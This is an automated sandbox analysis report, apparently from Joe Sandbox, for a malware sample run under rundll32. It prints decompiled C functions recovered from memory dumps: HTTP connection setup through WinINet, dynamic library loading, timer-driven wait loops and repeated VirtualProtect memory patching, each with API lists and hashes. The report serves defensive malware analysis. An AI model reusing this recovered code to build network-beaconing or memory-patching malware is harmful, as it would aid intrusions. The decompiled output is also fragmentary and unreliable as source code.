					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E036D6C2C(_t56);
					} else {
						E036D6C2C( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E036D7A86) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E036D6E40( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x36da348; // 0x228d5a8
						_t15 = _t59 + 0x36db73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                                                          0x036d7af1
                                                          0x036d7af1
                                                          0x036d7afc
                                                          0x036d7b03
                                                          0x036d7b0b
                                                          0x036d7b15
                                                          0x036d7b1b
                                                          0x036d7b2e
                                                          0x036d7b3e
                                                          0x036d7b30
                                                          0x036d7b33
                                                          0x036d7b38
                                                          0x036d7b38
                                                          0x036d7b2e
                                                          0x036d7b4e
                                                          0x036d7b54
                                                          0x036d7b59
                                                          0x036d7c42
                                                          0x00000000
                                                          0x036d7b74
                                                          0x036d7b77
                                                          0x036d7b8a
                                                          0x036d7b90
                                                          0x036d7b95
                                                          0x036d7bbd
                                                          0x036d7bd0
                                                          0x036d7bda
                                                          0x036d7bdd
                                                          0x036d7be3
                                                          0x036d7be8
                                                          0x00000000
                                                          0x00000000
                                                          0x036d7bec
                                                          0x036d7bf8
                                                          0x036d7c09
                                                          0x036d7c0b
                                                          0x036d7c1c
                                                          0x036d7c1c
                                                          0x036d7c2c
                                                          0x00000000
                                                          0x036d7c3e
                                                          0x00000000
                                                          0x036d7c3e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d7b95

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,76C84D40), ref: 036D7B03
                                                            • Part of subcall function 036D6D63: RtlAllocateHeap.NTDLL(00000000,00000000,036D5D7B), ref: 036D6D6F
                                                          • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 036D7B26
                                                          • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 036D7B4E
                                                          • InternetSetStatusCallback.WININET(00000000,036D7A86), ref: 036D7B65
                                                          • ResetEvent.KERNEL32(?), ref: 036D7B77
                                                          • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 036D7B8A
                                                          • GetLastError.KERNEL32 ref: 036D7B97
                                                          • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 036D7BDD
                                                          • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 036D7BFB
                                                          • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 036D7C1C
                                                          • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 036D7C28
                                                          • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 036D7C38
                                                          • GetLastError.KERNEL32 ref: 036D7C42
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                                                          • String ID:
                                                          • API String ID: 2290446683-0
                                                          • Opcode ID: d9c0fa19a005961aa108f51328f8f46bee7dc9a55e00ac48b90894479145ca37
                                                          • Instruction ID: 8ad98c52f701801d43dae95597ae516f97f7f305bdd98d5de09b181c2d881080
                                                          • Opcode Fuzzy Hash: d9c0fa19a005961aa108f51328f8f46bee7dc9a55e00ac48b90894479145ca37
                                                          • Instruction Fuzzy Hash: 9A418C71D00204BFD731AFA5DD49E6BBFBDEB49704F145928F502E2298E771A614DB20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D7F35 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 243 36d7f35-36d7f9a 244 36d7f9c-36d7fb6 RaiseException 243->244 245 36d7fbb-36d7fe5 243->245 246 36d816b-36d816f 244->246 247 36d7fea-36d7ff6 245->247 248 36d7fe7 245->248 249 36d8009-36d800b 247->249 250 36d7ff8-36d8003 247->250 248->247 251 36d8011-36d8018 249->251 252 36d80b3-36d80bd 249->252 250->249 262 36d814e-36d8155 250->262 256 36d8028-36d8035 LoadLibraryA 251->256 257 36d801a-36d8026 251->257 254 36d80bf-36d80c7 252->254 255 36d80c9-36d80cb 252->255 254->255 258 36d80cd-36d80d0 255->258 259 36d8149-36d814c 255->259 260 36d8078-36d8084 InterlockedExchange 256->260 261 36d8037-36d8047 GetLastError 256->261 257->256 257->260 266 36d80fe-36d810c GetProcAddress 258->266 267 36d80d2-36d80d5 258->267 259->262 270 36d80ac-36d80ad FreeLibrary 260->270 271 36d8086-36d808a 260->271 268 36d8049-36d8055 261->268 269 36d8057-36d8073 RaiseException 261->269 263 36d8169 262->263 264 36d8157-36d8164 262->264 263->246 264->263 266->259 274 36d810e-36d811e GetLastError 266->274 267->266 273 36d80d7-36d80e2 267->273 268->260 268->269 269->246 270->252 271->252 275 36d808c-36d8098 LocalAlloc 271->275 273->266 276 36d80e4-36d80ea 273->276 278 36d812a-36d812c 274->278 279 36d8120-36d8128 274->279 275->252 280 36d809a-36d80aa 275->280 276->266 281 36d80ec-36d80ef 276->281 278->259 282 36d812e-36d8146 RaiseException 278->282 279->278 280->252 281->266 283 36d80f1-36d80fc 281->283 282->259 283->259 283->266
                                                          C-Code - Quality: 51%
                                                          			E036D7F35(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x36d0000;
				_t115 = _t139[3] + 0x36d0000;
				_t131 = _t139[4] + 0x36d0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x36d0000;
				_v16 = _t139[5] + 0x36d0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x36d0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x36da1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x36da1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x36da1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x36da1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x36da1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x36da1b8; // 0x0
										 *_t102 = _t125;
										 *0x36da1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x36da1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                                          0x036d7f44
                                                          0x036d7f5a
                                                          0x036d7f60
                                                          0x036d7f62
                                                          0x036d7f67
                                                          0x036d7f6d
                                                          0x036d7f72
                                                          0x036d7f75
                                                          0x036d7f83
                                                          0x036d7f8a
                                                          0x036d7f8d
                                                          0x036d7f90
                                                          0x036d7f91
                                                          0x036d7f94
                                                          0x036d7f97
                                                          0x036d7f9a
                                                          0x036d7f9f
                                                          0x036d7fae
                                                          0x00000000
                                                          0x036d7fb4
                                                          0x036d7fbe
                                                          0x036d7fc8
                                                          0x036d7fcd
                                                          0x036d7fcf
                                                          0x036d7fd9
                                                          0x036d7fdc
                                                          0x036d7fdf
                                                          0x036d7fe5
                                                          0x036d7fe7
                                                          0x036d7fe7
                                                          0x036d7fea
                                                          0x036d7fed
                                                          0x036d7ff2
                                                          0x036d7ff6
                                                          0x036d8009
                                                          0x036d800b
                                                          0x036d80b3
                                                          0x036d80b3
                                                          0x036d80ba
                                                          0x036d80bd
                                                          0x036d80c7
                                                          0x036d80c7
                                                          0x036d80cb
                                                          0x036d8149
                                                          0x036d814c
                                                          0x036d814e
                                                          0x036d814e
                                                          0x036d8155
                                                          0x036d8157
                                                          0x036d8161
                                                          0x036d8164
                                                          0x036d8167
                                                          0x036d8167
                                                          0x00000000
                                                          0x036d80cd
                                                          0x036d80d0
                                                          0x036d80fe
                                                          0x036d8108
                                                          0x036d810c
                                                          0x036d8114
                                                          0x036d8117
                                                          0x036d811e
                                                          0x036d8128
                                                          0x036d8128
                                                          0x036d812c
                                                          0x036d8131
                                                          0x036d8140
                                                          0x036d8146
                                                          0x036d8146
                                                          0x036d812c
                                                          0x00000000
                                                          0x036d80d7
                                                          0x036d80da
                                                          0x036d80e2
                                                          0x036d80f7
                                                          0x036d80fc
                                                          0x00000000
                                                          0x00000000
                                                          0x036d80fc
                                                          0x00000000
                                                          0x036d80e2
                                                          0x036d80d0
                                                          0x036d80cb
                                                          0x036d8011
                                                          0x036d8018
                                                          0x036d8028
                                                          0x036d802b
                                                          0x036d8031
                                                          0x036d8035
                                                          0x036d8078
                                                          0x036d8084
                                                          0x036d80ad
                                                          0x036d8086
                                                          0x036d808a
                                                          0x036d8090
                                                          0x036d8098
                                                          0x036d809a
                                                          0x036d809d
                                                          0x036d80a3
                                                          0x036d80a5
                                                          0x036d80a5
                                                          0x036d8098
                                                          0x036d808a
                                                          0x00000000
                                                          0x036d8084
                                                          0x036d803d
                                                          0x036d8040
                                                          0x036d8047
                                                          0x036d8057
                                                          0x036d805a
                                                          0x036d806a
                                                          0x00000000
                                                          0x036d8070
                                                          0x036d8051
                                                          0x036d8055
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8055
                                                          0x036d8022
                                                          0x036d8026
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d8026
                                                          0x036d7fff
                                                          0x036d8003
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 036D7FAE
                                                          • LoadLibraryA.KERNEL32(?), ref: 036D802B
                                                          • GetLastError.KERNEL32 ref: 036D8037
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 036D806A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: 0efa18422d27dbf43e4fa2e708f60293a5687c0d33dc7af5b765c11cede02a89
                                                          • Instruction ID: 8db35b79daa2478cdb8a01fece4552abd965b92dfc4a36b5136c4df6b8b5da00
                                                          • Opcode Fuzzy Hash: 0efa18422d27dbf43e4fa2e708f60293a5687c0d33dc7af5b765c11cede02a89
                                                          • Instruction Fuzzy Hash: 8C810971E01305AFDB20DFA9E984BAEBBF9BB48710F148129E905E7344E770E945CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D661D Relevance: 16.7, APIs: 11, Instructions: 151timememoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 285 36d661d-36d664f memset CreateWaitableTimerA 286 36d6655-36d66ae _allmul SetWaitableTimer WaitForMultipleObjects 285->286 287 36d67d0-36d67d6 GetLastError 285->287 289 36d6738-36d673e 286->289 290 36d66b4-36d66b7 286->290 288 36d67da-36d67e4 287->288 291 36d673f-36d6743 289->291 292 36d66b9 call 36d216c 290->292 293 36d66c2 290->293 294 36d6745-36d674d RtlFreeHeap 291->294 295 36d6753-36d6757 291->295 298 36d66be-36d66c0 292->298 297 36d66cc 293->297 294->295 295->291 299 36d6759-36d6763 CloseHandle 295->299 300 36d66d0-36d66d5 297->300 298->293 298->297 299->288 301 36d66e8-36d6715 call 36d43eb 300->301 302 36d66d7-36d66de 300->302 306 36d6765-36d676a 301->306 307 36d6717-36d6722 301->307 302->301 304 36d66e0 302->304 304->301 309 36d676c-36d6772 306->309 310 36d6789-36d6791 306->310 307->300 308 36d6724-36d672f call 36d70d8 307->308 315 36d6734 308->315 309->289 313 36d6774-36d6787 call 36d561e 309->313 311 36d6797-36d67c5 _allmul SetWaitableTimer WaitForMultipleObjects 310->311 311->300 314 36d67cb 311->314 313->311 314->289 315->289
                                                          C-Code - Quality: 83%
                                                          			E036D661D(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x36da2e0);
					_v76 = 0;
					_v80 = 0;
					L036D824A();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x36da30c; // 0x2cc
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x36da2ec = 5;
						} else {
							_t69 = E036D216C(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x36da300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E036D43EB( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E036D70D8(_t75,  &_v72, _a4, _a8); // executed
							_v124.HighPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x36da2e4);
							goto L21;
						} else {
							__eflags =  *0x36da2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E036D561E();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x36da2e8);
								L21:
								L036D824A();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x36da2d8, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                                                          0x036d661d
                                                          0x036d6633
                                                          0x036d6637
                                                          0x036d663c
                                                          0x036d6643
                                                          0x036d6649
                                                          0x036d664f
                                                          0x036d67d6
                                                          0x036d6655
                                                          0x036d6655
                                                          0x036d6657
                                                          0x036d665c
                                                          0x036d665d
                                                          0x036d6663
                                                          0x036d6667
                                                          0x036d666b
                                                          0x036d6679
                                                          0x036d6687
                                                          0x036d668b
                                                          0x036d668d
                                                          0x036d669a
                                                          0x036d66a6
                                                          0x036d66a8
                                                          0x036d66ae
                                                          0x036d66b7
                                                          0x036d66c2
                                                          0x036d66c2
                                                          0x036d66b9
                                                          0x036d66b9
                                                          0x036d66c0
                                                          0x00000000
                                                          0x00000000
                                                          0x036d66c0
                                                          0x036d66cc
                                                          0x00000000
                                                          0x036d66d0
                                                          0x036d66d5
                                                          0x036d66e0
                                                          0x036d66e0
                                                          0x036d66e8
                                                          0x036d66ee
                                                          0x036d66f6
                                                          0x036d66ff
                                                          0x036d6706
                                                          0x036d670a
                                                          0x036d670f
                                                          0x036d6715
                                                          0x00000000
                                                          0x00000000
                                                          0x036d6717
                                                          0x036d671b
                                                          0x036d6722
                                                          0x00000000
                                                          0x036d6724
                                                          0x036d672f
                                                          0x036d6734
                                                          0x036d6734
                                                          0x00000000
                                                          0x036d6765
                                                          0x036d6765
                                                          0x036d676a
                                                          0x036d6789
                                                          0x036d678b
                                                          0x036d6790
                                                          0x036d6791
                                                          0x00000000
                                                          0x036d676c
                                                          0x036d676c
                                                          0x036d6772
                                                          0x00000000
                                                          0x036d6774
                                                          0x036d6774
                                                          0x036d6779
                                                          0x036d677b
                                                          0x036d6780
                                                          0x036d6781
                                                          0x036d6797
                                                          0x036d6797
                                                          0x036d679f
                                                          0x036d67ad
                                                          0x036d67b1
                                                          0x036d67bd
                                                          0x036d67bf
                                                          0x036d67c3
                                                          0x036d67c5
                                                          0x00000000
                                                          0x036d67cb
                                                          0x00000000
                                                          0x036d67cb
                                                          0x036d67c5
                                                          0x036d6772
                                                          0x00000000
                                                          0x036d676a
                                                          0x036d6738
                                                          0x036d673a
                                                          0x036d673e
                                                          0x036d673f
                                                          0x036d673f
                                                          0x036d6743
                                                          0x036d674d
                                                          0x036d674d
                                                          0x036d6753
                                                          0x036d6756
                                                          0x036d6756
                                                          0x036d675d
                                                          0x036d675d
                                                          0x036d67e4
                                                          0x00000000

                                                          APIs
                                                          • memset.NTDLL ref: 036D6637
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 036D6643
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 036D666B
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 036D668B
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,036D3EE8,?), ref: 036D66A6
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,036D3EE8,?,00000000), ref: 036D674D
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,036D3EE8,?,00000000,?,?), ref: 036D675D
                                                          • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 036D6797
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 036D67B1
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 036D67BD
                                                            • Part of subcall function 036D216C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05969400,00000000,?,76CDF710,00000000,76CDF730), ref: 036D21BB
                                                            • Part of subcall function 036D216C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05969438,?,00000000,30314549,00000014,004F0053,059693F4), ref: 036D2258
                                                            • Part of subcall function 036D216C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,036D66BE), ref: 036D226A
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,036D3EE8,?,00000000,?,?), ref: 036D67D0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                          • String ID:
                                                          • API String ID: 3521023985-0
                                                          • Opcode ID: 7443dcc3758737742cc244c34467601de2f1d976346cb18d643568cfa3796373
                                                          • Instruction ID: 4f6a097fd5b7cb7a33951f27f2ad416df35a2e14ecd70742f11379d05d22134f
                                                          • Opcode Fuzzy Hash: 7443dcc3758737742cc244c34467601de2f1d976346cb18d643568cfa3796373
                                                          • Instruction Fuzzy Hash: 80517C71809324AFC710EF65DC48DABBBECEB89320F544A1EF8A5D2294D7708554CFA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06271A0A Relevance: 15.1, APIs: 10, Instructions: 117memorystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 318 6271a0a-6271a2b call 6293d64 321 6271a31-6271a32 318->321 322 6271b0d 318->322 323 6271a34-6271a37 321->323 324 6271a98-6271a9f 321->324 325 6271b13-6271b22 VirtualProtect 322->325 326 6271b64-6271b70 call 6293d9f 323->326 327 6271a3d 323->327 330 6271aa1-6271aa8 324->330 331 6271ae0-6271af5 VirtualProtect 324->331 328 6271b24-6271b3a VirtualProtect 325->328 329 6271b3f-6271b45 GetLastError 325->329 334 6271a43-6271a4a 327->334 328->334 329->326 330->331 332 6271aaa-6271ab6 330->332 331->325 333 6271af7-6271b0b 331->333 332->325 336 6271ab8-6271ac5 VirtualProtect 332->336 337 6271adc-6271ade VirtualProtect 333->337 338 6271a8c-6271a93 334->338 339 6271a4c-6271a50 334->339 336->325 341 6271ac7-6271adb 336->341 337->325 338->326 339->338 342 6271a52-6271a6e lstrlen VirtualProtect 339->342 341->337 342->338 343 6271a70-6271a8a lstrcpy VirtualProtect 342->343 343->338
                                                          APIs
                                                          • lstrlen.KERNEL32(?,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977,0628893A,?,?), ref: 06271A58
                                                          • VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271A6A
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 06271A79
                                                          • VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271A8A
                                                          • VirtualProtect.KERNEL32(00000001,00000005,00000040,-0000001C,06296040,00000018,062734DB,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000), ref: 06271AC1
                                                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271ADC
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,06296040,00000018,062734DB,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000), ref: 06271AF1
                                                          • VirtualProtect.KERNEL32(?,00000004,00000040,-0000001C,06296040,00000018,062734DB,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000), ref: 06271B1E
                                                          • VirtualProtect.KERNEL32(?,00000004,?,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271B38
                                                          • GetLastError.KERNEL32(?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977,0628893A,?,?), ref: 06271B3F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3676034644-0
                                                          • Opcode ID: f0858161ba6842cf221759b88905f91ce2d15e59b289ad79728eaa76051973d1
